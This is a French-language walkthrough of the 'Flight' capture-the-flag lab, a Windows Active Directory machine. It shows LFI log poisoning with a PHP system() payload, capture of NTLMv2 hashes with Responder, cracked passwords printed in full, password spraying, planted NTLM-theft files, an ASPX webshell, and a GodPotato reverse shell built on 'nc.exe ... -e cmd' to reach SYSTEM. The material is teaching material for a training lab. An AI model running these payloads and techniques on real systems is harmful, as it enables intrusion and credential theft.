Flight

smb ntlm responder theft aspx

Nom machine : Flight
Difficulté : Difficile
OS : Windows - AD

Enumération

NMAP

Nmap scan report for 10.10.11.187
Host is up (0.030s latency).
Not shown: 65517 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
|_http-title: g0 Aviation
|_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
| http-methods: 
|_  Potentially risky methods: TRACE
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-11-13 20:21:32Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49687/tcp open  msrpc         Microsoft Windows RPC
49695/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: G0; OS: Windows; CPE: cpe:/o:microsoft:windows

HTTP (80)

Nous avons accès à une page web. Tout en bas on aperçoit un nom de domain : flight.htb.

Nous allons énumérer de possible sous-domaine.

┌──(kali㉿kali)-[~]
└─$ ffuf -v -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://flight.htb -t 50 -H "Host: FUZZ.flight.htb" -fs 7069

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://flight.htb
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
 :: Header           : Host: FUZZ.flight.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 50
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response size: 7069
________________________________________________

[Status: 200, Size: 3996, Words: 1045, Lines: 91, Duration: 32ms]
| URL | http://flight.htb
    * FUZZ: school

:: Progress: [114441/114441] :: Job [1/1] :: 269 req/sec :: Duration: [0:03:50] :: Errors: 0 ::

Nous ajoutons school à /etc/hosts

En naviguant sur le nouveau site, on remarque rapidement "?view=". Nous allons tenter une LFI.

Accès initial

Nous avons obtenu une réponse pour : http://school.flight.htb/index.php?view=/WINDOWS/system32/drivers/etc/services

Nous pouvons maintenant tester une liste de fichier :

https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/LFI/LFI-gracefulsecurity-windows.txtgithub.com

Avec gedit et "find and remplace", nous avons enlevé les "C:"

Nous pouvons maintenant tester dans Burp Suite. Nous capturons la requête, la transférons dans intruder, marquons la position du payload, puis ajointons la liste précemment obtenue.

Nous obtenons une liste de fichier possiblement intéressant. Parmi eux, des fichiers de log... qui notent l'user-agent.

Points particuliers : dans Burp les caractères spéciaux ont automatiquement était converti en URL, nous pouvons enlever cette option. Ici cela a fonctionné, ce qui n'est pas toujours le cas.

Nous allons effectuer une attaque dite de Log Poisoning à l'aide du fichier access.log

Nous avons noté <?php system($_GET['pwn']); ?> dans l'user-agent puis &pwn=ping+10.10.14.19 à la suite du fichier.

Sur notre machine nous avons bien obtenu un retour.

┌──(kali㉿kali)-[~]
└─$ sudo tcpdump -i tun0
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
09:21:08.844895 IP 10.10.14.19.36608 > flight.htb.http: Flags [S], seq 514033807, win 32120, options [mss 1460,sackOK,TS val 1433700026 ecr 0,nop,wscale 7], length 0
09:21:08.873709 IP flight.htb.http > 10.10.14.19.36608: Flags [S.], seq 4259520780, ack 514033808, win 65535, options [mss 1340,nop,wscale 8,nop,nop,sackOK], length 0
09:21:08.873739 IP 10.10.14.19.36608 > flight.htb.http: Flags [.], ack 1, win 251, length 0
09:21:08.874100 IP 10.10.14.19.36608 > flight.htb.http: Flags [P.], seq 1:413, ack 1, win 251, length 412: HTTP: GET /index.php?view=%2fxampp%2fapache%2flogs%2facess.log&pwd=ping+10.10.14.19 HTTP/1.1
09:21:08.912267 IP flight.htb.http > 10.10.14.19.36608: Flags [P.], seq 1:1321, ack 413, win 1024, length 1320: HTTP: HTTP/1.1 200 OK
09:21:08.912292 IP 10.10.14.19.36608 > flight.htb.http: Flags [.], ack 1321, win 249, length 0
09:21:08.912303 IP flight.htb.http > 10.10.14.19.36608: Flags [F.], seq 1321, ack 413, win 1024, length 0
09:21:08.912759 IP 10.10.14.19.36608 > flight.htb.http: Flags [F.], seq 413, ack 1322, win 249, length 0
09:21:08.939999 IP flight.htb.http > 10.10.14.19.36608: Flags [.], ack 414, win 1024, length 0

Nous pouvons maintenant essayer d'obtenir un reverse shell.

Sans résultat...

Nous allons voir si nous pouvons obtenir une RFI.

http://school.flight.htb/index.php?view=http://10.10.14.19

Nous avions un server python au port 80 actif et qui a obtenu une réponse.

Nous allons lancer responder pour espérer obtenir un hash grâce à SMB.

http://school.flight.htb/index.php?view=//10.10.14.19/log.txt

┌──(kali㉿kali)-[~]
└─$ sudo responder -I tun0

{...}

[SMB] NTLMv2-SSP Client   : 10.10.11.187
[SMB] NTLMv2-SSP Username : flight\svc_apache
[SMB] NTLMv2-SSP Hash     : svc_apache::flight:e2ab02935476a936:0D02C760936C72595312E0EFE95B1250:010100000000000000BD2C9DB135DB01CFE028A4C25050E500000000020008005700360047005A0001001E00570049004E002D0044005A003800420033005A004F00550053003100460004003400570049004E002D0044005A003800420033005A004F0055005300310046002E005700360047005A002E004C004F00430041004C00030014005700360047005A002E004C004F00430041004C00050014005700360047005A002E004C004F00430041004C000700080000BD2C9DB135DB01060004000200000008003000300000000000000000000000003000008189617382C68990BF5AAC64DFCFDB75ECE641810822B7ACCF48E6D7073B9BEF0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00310039000000000000000000

Nous allons le cracker. Tout d'abord on l'enregistre dans un fichier.

┌──(kali㉿kali)-[~]
└─$ hashcat -h | grep NTLM
   5500 | NetNTLMv1 / NetNTLMv1+ESS                                  | Network Protocol
  27000 | NetNTLMv1 / NetNTLMv1+ESS (NT)                             | Network Protocol
   5600 | NetNTLMv2                                                  | Network Protocol
  27100 | NetNTLMv2 (NT)                                             | Network Protocol
   1000 | NTLM                                                       | Operating System
┌──(kali㉿kali)-[~]
└─$ hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

{...}

SVC_APACHE::flight:e2ab02935476a936:0d02c760936c72595312e0efe95b1250:010100000000000000bd2c9db135db01cfe028a4c25050e500000000020008005700360047005a0001001e00570049004e002d0044005a003800420033005a004f00550053003100460004003400570049004e002d0044005a003800420033005a004f0055005300310046002e005700360047005a002e004c004f00430041004c00030014005700360047005a002e004c004f00430041004c00050014005700360047005a002e004c004f00430041004c000700080000bd2c9db135db01060004000200000008003000300000000000000000000000003000008189617382c68990bf5aac64dfcfdb75ece641810822b7accf48e6d7073b9bef0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00310039000000000000000000:S@Ss!K@*t13

{...}

a l'aide de nxc on découvre plusieurs partage

┌──(kali㉿kali)-[~]
└─$ nxc smb flight.htb -u svc_apache -p 'S@Ss!K@*t13' --shares
SMB         10.10.11.187    445    G0               [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.187    445    G0               [+] flight.htb\svc_apache:S@Ss!K@*t13 
SMB         10.10.11.187    445    G0               [*] Enumerated shares
SMB         10.10.11.187    445    G0               Share           Permissions     Remark
SMB         10.10.11.187    445    G0               -----           -----------     ------
SMB         10.10.11.187    445    G0               ADMIN$                          Remote Admin
SMB         10.10.11.187    445    G0               C$                              Default share
SMB         10.10.11.187    445    G0               IPC$            READ            Remote IPC
SMB         10.10.11.187    445    G0               NETLOGON        READ            Logon server share 
SMB         10.10.11.187    445    G0               Shared          READ            
SMB         10.10.11.187    445    G0               SYSVOL          READ            Logon server share 
SMB         10.10.11.187    445    G0               Users           READ            
SMB         10.10.11.187    445    G0               Web             READ

Rien d'intéressant.

A l'aide du même outil nous allons énumérer les utilisateurs. Pour pouvoir ensuite tester le protocole kerberos.

┌──(kali㉿kali)-[~]
└─$ nxc smb flight.htb -u svc_apache -p 'S@Ss!K@*t13' --rid-brute
SMB         10.10.11.187    445    G0               [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.187    445    G0               [+] flight.htb\svc_apache:S@Ss!K@*t13 
SMB         10.10.11.187    445    G0               498: flight\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.11.187    445    G0               500: flight\Administrator (SidTypeUser)
SMB         10.10.11.187    445    G0               501: flight\Guest (SidTypeUser)
SMB         10.10.11.187    445    G0               502: flight\krbtgt (SidTypeUser)
SMB         10.10.11.187    445    G0               512: flight\Domain Admins (SidTypeGroup)
SMB         10.10.11.187    445    G0               513: flight\Domain Users (SidTypeGroup)
SMB         10.10.11.187    445    G0               514: flight\Domain Guests (SidTypeGroup)
SMB         10.10.11.187    445    G0               515: flight\Domain Computers (SidTypeGroup)
SMB         10.10.11.187    445    G0               516: flight\Domain Controllers (SidTypeGroup)
SMB         10.10.11.187    445    G0               517: flight\Cert Publishers (SidTypeAlias)
SMB         10.10.11.187    445    G0               518: flight\Schema Admins (SidTypeGroup)
SMB         10.10.11.187    445    G0               519: flight\Enterprise Admins (SidTypeGroup)
SMB         10.10.11.187    445    G0               520: flight\Group Policy Creator Owners (SidTypeGroup)
SMB         10.10.11.187    445    G0               521: flight\Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.11.187    445    G0               522: flight\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.10.11.187    445    G0               525: flight\Protected Users (SidTypeGroup)
SMB         10.10.11.187    445    G0               526: flight\Key Admins (SidTypeGroup)
SMB         10.10.11.187    445    G0               527: flight\Enterprise Key Admins (SidTypeGroup)
SMB         10.10.11.187    445    G0               553: flight\RAS and IAS Servers (SidTypeAlias)
SMB         10.10.11.187    445    G0               571: flight\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.10.11.187    445    G0               572: flight\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.10.11.187    445    G0               1000: flight\Access-Denied Assistance Users (SidTypeAlias)
SMB         10.10.11.187    445    G0               1001: flight\G0$ (SidTypeUser)
SMB         10.10.11.187    445    G0               1102: flight\DnsAdmins (SidTypeAlias)
SMB         10.10.11.187    445    G0               1103: flight\DnsUpdateProxy (SidTypeGroup)
SMB         10.10.11.187    445    G0               1602: flight\S.Moon (SidTypeUser)
SMB         10.10.11.187    445    G0               1603: flight\R.Cold (SidTypeUser)
SMB         10.10.11.187    445    G0               1604: flight\G.Lors (SidTypeUser)
SMB         10.10.11.187    445    G0               1605: flight\L.Kein (SidTypeUser)
SMB         10.10.11.187    445    G0               1606: flight\M.Gold (SidTypeUser)
SMB         10.10.11.187    445    G0               1607: flight\C.Bum (SidTypeUser)
SMB         10.10.11.187    445    G0               1608: flight\W.Walker (SidTypeUser)
SMB         10.10.11.187    445    G0               1609: flight\I.Francis (SidTypeUser)
SMB         10.10.11.187    445    G0               1610: flight\D.Truff (SidTypeUser)
SMB         10.10.11.187    445    G0               1611: flight\V.Stevens (SidTypeUser)
SMB         10.10.11.187    445    G0               1612: flight\svc_apache (SidTypeUser)
SMB         10.10.11.187    445    G0               1613: flight\O.Possum (SidTypeUser)
SMB         10.10.11.187    445    G0               1614: flight\WebDevs (SidTypeGroup)

Sans succès pour kerberos. Nous allons voir si le password de svc_apache est réutilisé.

┌──(kali㉿kali)-[~]
└─$ nxc smb flight.htb -u flight.txt -p 'S@Ss!K@*t13' --continue-on-success
SMB         10.10.11.187    445    G0               [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.187    445    G0               [-] flight.htb\Administrator:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB         10.10.11.187    445    G0               [-] flight.htb\Guest:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB         10.10.11.187    445    G0               [-] flight.htb\krbtgt:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB         10.10.11.187    445    G0               [-] flight.htb\G0$:S@Ss!K@*t13 STATUS_LOGON_FAILURE 
SMB         10.10.11.187    445    G0               [+] flight.htb\S.Moon:S@Ss!K@*t13 
SMB         10.10.11.187    445    G0               [-] flight.htb\R.Cold:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB         10.10.11.187    445    G0               [-] flight.htb\G.Lors:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB         10.10.11.187    445    G0               [-] flight.htb\L.Kein:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB         10.10.11.187    445    G0               [-] flight.htb\M.Gold:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB         10.10.11.187    445    G0               [-] flight.htb\C.Bum:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB         10.10.11.187    445    G0               [-] flight.htb\W.Walker:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB         10.10.11.187    445    G0               [-] flight.htb\I.Francis:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB         10.10.11.187    445    G0               [-] flight.htb\D.Truff:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB         10.10.11.187    445    G0               [-] flight.htb\V.Stevens:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB         10.10.11.187    445    G0               [+] flight.htb\svc_apache:S@Ss!K@*t13 
SMB         10.10.11.187    445    G0               [-] flight.htb\O.Possum:S@Ss!K@*t13 STATUS_LOGON_FAILURE

┌──(kali㉿kali)-[~]
└─$ nxc smb flight.htb -u s.moon -p 'S@Ss!K@*t13' --shares
SMB         10.10.11.187    445    G0               [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.187    445    G0               [+] flight.htb\s.moon:S@Ss!K@*t13 
SMB         10.10.11.187    445    G0               [*] Enumerated shares
SMB         10.10.11.187    445    G0               Share           Permissions     Remark
SMB         10.10.11.187    445    G0               -----           -----------     ------
SMB         10.10.11.187    445    G0               ADMIN$                          Remote Admin
SMB         10.10.11.187    445    G0               C$                              Default share
SMB         10.10.11.187    445    G0               IPC$            READ            Remote IPC
SMB         10.10.11.187    445    G0               NETLOGON        READ            Logon server share 
SMB         10.10.11.187    445    G0               Shared          READ,WRITE      
SMB         10.10.11.187    445    G0               SYSVOL          READ            Logon server share 
SMB         10.10.11.187    445    G0               Users           READ            
SMB         10.10.11.187    445    G0               Web             READ

Nous avons maintenant des droits en écriture. Et si nous testions d'obtenir une nouvelle fois un hash avec Responder ?

GitHub - Greenwolf/ntlm_theft: A tool for generating multiple types of NTLMv2 hash theft files by Jacob Wilkin (Greenwolf)GitHub

┌──(kali㉿kali)-[~/ntlm_theft/athenax]
└─$ smbclient //10.10.11.187/shared -U s.moon
Password for [WORKGROUP\s.moon]:
Try "help" to get a list of possible commands.
smb: \> prompt off
smb: \> mput *
NT_STATUS_ACCESS_DENIED opening remote file \athenax-(externalcell).xlsx
putting file athenax-(fulldocx).xml as \athenax-(fulldocx).xml (463.3 kb/s) (average 463.3 kb/s)
NT_STATUS_ACCESS_DENIED opening remote file \athenax.m3u
NT_STATUS_ACCESS_DENIED opening remote file \athenax-(url).url
NT_STATUS_ACCESS_DENIED opening remote file \athenax.pdf
NT_STATUS_ACCESS_DENIED opening remote file \athenax.htm
NT_STATUS_ACCESS_DENIED opening remote file \athenax-(includepicture).docx
NT_STATUS_ACCESS_DENIED opening remote file \athenax.asx
putting file desktop.ini as \desktop.ini (0.6 kb/s) (average 300.5 kb/s)
NT_STATUS_ACCESS_DENIED opening remote file \athenax.rtf
putting file athenax-(stylesheet).xml as \athenax-(stylesheet).xml (1.9 kb/s) (average 220.8 kb/s)
NT_STATUS_ACCESS_DENIED opening remote file \athenax-(remotetemplate).docx
putting file athenax.application as \athenax.application (17.7 kb/s) (average 176.0 kb/s)
NT_STATUS_ACCESS_DENIED opening remote file \zoom-attack-instructions.txt
NT_STATUS_ACCESS_DENIED opening remote file \athenax.scf
NT_STATUS_ACCESS_DENIED opening remote file \Autorun.inf
NT_STATUS_ACCESS_DENIED opening remote file \athenax-(frameset).docx
NT_STATUS_ACCESS_DENIED opening remote file \athenax-(icon).url
putting file athenax.jnlp as \athenax.jnlp (2.3 kb/s) (average 147.0 kb/s)
NT_STATUS_ACCESS_DENIED opening remote file \athenax.lnk
NT_STATUS_ACCESS_DENIED opening remote file \athenax.wax
smb: \> dir
  .                                   D        0  Wed Nov 13 17:21:06 2024
  ..                                  D        0  Wed Nov 13 17:21:06 2024
  athenax-(fulldocx).xml              A    72585  Wed Nov 13 17:21:06 2024
  athenax-(stylesheet).xml            A      163  Wed Nov 13 17:21:06 2024
  athenax.application                 A     1650  Wed Nov 13 17:21:06 2024
  athenax.jnlp                        A      192  Wed Nov 13 17:21:06 2024
  desktop.ini                         A       47  Wed Nov 13 17:21:06 2024

Nous allons attendre un peu ...

┌──(kali㉿kali)-[~]
└─$ sudo responder -I tun0                  
[sudo] password for kali: 

{...}

[SMB] NTLMv2-SSP Hash     : c.bum::flight.htb:1db58c58b0c85541:9CAC77199720CAC3E2F0BFA0E30C05B6:010100000000000000CD1190B535DB01AA94607914651F430000000002000800580044004300490001001E00570049004E002D00390059004400310036003700310033004B0053004E0004003400570049004E002D00390059004400310036003700310033004B0053004E002E0058004400430049002E004C004F00430041004C000300140058004400430049002E004C004F00430041004C000500140058004400430049002E004C004F00430041004C000700080000CD1190B535DB01060004000200000008003000300000000000000000000000003000008189617382C68990BF5AAC64DFCFDB75ECE641810822B7ACCF48E6D7073B9BEF0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00310039000000000000000000

Nous allons cracker le hash comme fait précédemment.

C.BUM::flight.htb:1db58c58b0c85541:9cac77199720cac3e2f0bfa0e30c05b6:010100000000000000cd1190b535db01aa94607914651f430000000002000800580044004300490001001e00570049004e002d00390059004400310036003700310033004b0053004e0004003400570049004e002d00390059004400310036003700310033004b0053004e002e0058004400430049002e004c004f00430041004c000300140058004400430049002e004c004f00430041004c000500140058004400430049002e004c004f00430041004c000700080000cd1190b535db01060004000200000008003000300000000000000000000000003000008189617382c68990bf5aac64dfcfdb75ece641810822b7accf48e6d7073b9bef0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00310039000000000000000000:Tikkycoll_431012284

Elévation des privilèges

Nous avons les droits en écriture sur le partage web. Nous allons pouvoir upload un shell sur flight.htb.

Nous utilisons le reverse shell powershell base64 de revershell generator.

┌──(kali㉿kali)-[~]
└─$ nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.10.14.19] from (UNKNOWN) [10.10.11.187] 49972
whoami     
flight\svc_apache

a l'aide de la commande netstat, nous pouvoir voir que le port 8000 est ouvert. Nous allons effectuer une redirecton de port.

┌──(kali㉿kali)-[~]
└─$ chisel server --port 8888 --reverse 
2024/11/13 11:00:12 server: Reverse tunnelling enabled
2024/11/13 11:00:12 server: Fingerprint NGCqqZxSH2ixsxXz5o3nLxlEPVC9O1R25QpH+/LAHQw=
2024/11/13 11:00:12 server: Listening on http://0.0.0.0:8888
2024/11/13 11:00:54 server: session#1: Client version (1.7.3) differs from server version (1.9.1-0kali1)
2024/11/13 11:00:54 server: session#1: tun: proxy#R:8000=>8000: Listening

┌──(kali㉿kali)-[~]
└─$ nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.10.14.19] from (UNKNOWN) [10.10.11.187] 50038
whoami
flight\svc_apache
PS C:\xampp\htdocs\flight.htb> cd /users/svc_apache
PS C:\users\svc_apache> cd desktop
PS C:\users\svc_apache\desktop> ./chisel.exe client 10.10.14.19:8888 R:8000:127.0.0.1:8000

Nous allons voir si on trouve des informations complémentaires à partir des fichiers.

Le site correspond bien au dossier development. Nous allons voir qui a les droits dessus en écriture.

PS C:\inetpub\development> icacls .
. flight\C.Bum:(OI)(CI)(W)
  NT SERVICE\TrustedInstaller:(I)(F)
  NT SERVICE\TrustedInstaller:(I)(OI)(CI)(IO)(F)
  NT AUTHORITY\SYSTEM:(I)(F)
  NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
  BUILTIN\Administrators:(I)(F)
  BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
  BUILTIN\Users:(I)(RX)
  BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
  CREATOR OWNER:(I)(OI)(CI)(IO)(F)

C.Bum peut le faire ! Nous allons changer d'utilisateur grâce à runasCs

PS C:\users\svc_apache\desktop> iwr -uri http://10.10.14.19:80/Tools/RunasCs.exe -Outfile run.exe

./run.exe C.Bum Tikkycoll_431012284 -r 10.10.14.19:1235 cmd

┌──(kali㉿kali)-[~]
└─$ nc -lnvp 1235                    
listening on [any] 1235 ...
connect to [10.10.14.19] from (UNKNOWN) [10.10.11.187] 50104
Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
flight\c.bum

Nous pouvons maintenant écrire dans le dossier.

Nous allons upload un shell cmd.aspx.

webshell/fuzzdb-webshell/asp/cmd.aspx at master · tennc/webshellGitHub

On n'oublie pas le /c avant le reverse shell. Nous avons utilisé le même qu'avant, c'est à dire powershell base64.

┌──(kali㉿kali)-[~]
└─$ nc -lnvp 1236
listening on [any] 1236 ...
connect to [10.10.14.19] from (UNKNOWN) [10.10.11.187] 50153
whoami
iis apppool\defaultapppool

PS C:\windows\system32\inetsrv> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeMachineAccountPrivilege     Add workstations to domain                Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

SeImpersonatePrivilege

On télécharge et exécute GodPotato et nc.exe

PS C:\users\public\documents> ./god.exe -cmd 'cmd /c C:\users\public\documents\nc.exe 10.10.14.19 4444 -e cmd'

┌──(kali㉿kali)-[~]
└─$ nc -lnvp 4444                    
listening on [any] 4444 ...
connect to [10.10.14.19] from (UNKNOWN) [10.10.11.187] 50171
Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\users\public\documents>whoami
whoami
nt authority\system

Nous sommes nt authority\system !

PrécédentEscape SuivantForest

Mis à jour il y a 1 an

hashtagEnumération

hashtagNMAP

hashtagHTTP (80)

hashtagAccès initial

hashtagElévation des privilèges

Enumération

NMAP

HTTP (80)

Accès initial

Elévation des privilèges